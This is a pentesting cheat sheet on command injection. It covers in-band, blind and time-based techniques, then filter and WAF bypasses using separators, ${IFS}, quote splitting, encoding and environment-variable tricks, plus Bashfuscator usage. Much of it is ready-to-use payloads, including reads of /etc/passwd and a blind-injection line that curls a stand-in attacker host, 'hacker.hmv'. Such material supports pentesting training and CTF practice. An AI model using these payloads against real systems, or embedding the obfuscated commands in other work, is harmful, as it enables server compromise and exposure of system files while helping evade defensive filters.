Skip to content

Command Injection

Theory

Command Injection allows executing commands on the server where the application runs. It occurs when the application does not sanitize user input and sends it to a function that executes it on the system.

Types of Command Injection

In-band Command Injection:

  1. Identify input executed by the system
  2. Test separators ; && ||
  3. Execute visible commands
; whoami
&& uname -a
| ls

Blind Command Injection

  1. Prepare listener
  2. Inject payload
  3. Confirm OOB execution
  4. Adjust payload
; ping -c 1 hacker.hmv
&& curl hacker.hmv

Time-Based

  1. Measure normal response time
  2. Inject sleep/ping
  3. Detect delay
; sleep 5
&& ping -c 5 127.0.0.1

Workflow

  1. Detect entry points

    • GET/POST.
    • Headers: User-Agent, Referer, X-Forwarded-For.
    • Cookies: Sessions, etc.
    • Filenames: File name and metadata.

  2. Test blacklisted and whitelisted characters. 

    p=127.0.0.1;
p=127.0.0.1&
p=127.0.0.1%0a

Note

You can use ffuf with the SecLists dictionary Fuzzing/command-injection-commix.txt

  1. Confirm execution 

    ; whoami
&& uname -a
| ls

  2. If your payload causes errors, bypass spaces, characters, or blacklisted words.

Bypasses

Separator Bypass

If separators like ; && || | are filtered:

p=127.0.0.1%0a%09
%0a
%0d

Space/Tab Bypass

To bypass spaces/tabs:

cat${IFS}/etc/passwd
%09
127.0.0.1%0a${IFS}
127.0.0.1%0a{ls,-la}
127.0.0.1%0a{cat,/etc/passwd}
127.0.0.1%0a${IFS}ls${IFS}-la

WAF / Blacklisted Commands Bypass

If commands like cat, ls, id, whoami are blocked:

w'h'o'a'm'i
w'h'o'am'i
w"h"o"am"i
who$@ami
w\ho\am\i
$(echo id)
echo id | base64 -d | sh
127.0.0.1%0aw'h'o'am'i

Encoding Bypass

If special characters are filtered, encode them.

Encoding Example
URL encode %3B%20id
Double URL %253B%2520id
Hex \x69\x64
Unicode \u0069\u0064 
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd

ENV Character Bypass

echo ${PATH:0:1}
/
echo ${LS_COLORS:10:1}
;

To add semicolon + space + id:
127.0.0.1${LS_COLORS:10:1}${IFS}id

Case Sensitive

Commands can be modified using reverse, base64, etc.

$(tr "[A-Z]" "[a-z]"<<<"whOaMi")
$(a="whOaMi";printf %s "${a,,}")
echo 'whoami' | rev
$(rev<<<'imaohw')

Convert to base64 and decode: 

echo -n 'cat /etc/passwd | grep 33' | base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

Note

More payloads at PayloadsAllTheThings

Evasion Tools

Bashfuscator

Installation: 

git clone https://github.com/Bashfuscator/Bashfuscator
cd Bashfuscator
pip3 install setuptools==65
python3 setup.py install --user
cd ./bashfuscator/bin/

Usage: 

bashfuscator -c "cat /etc/passwd"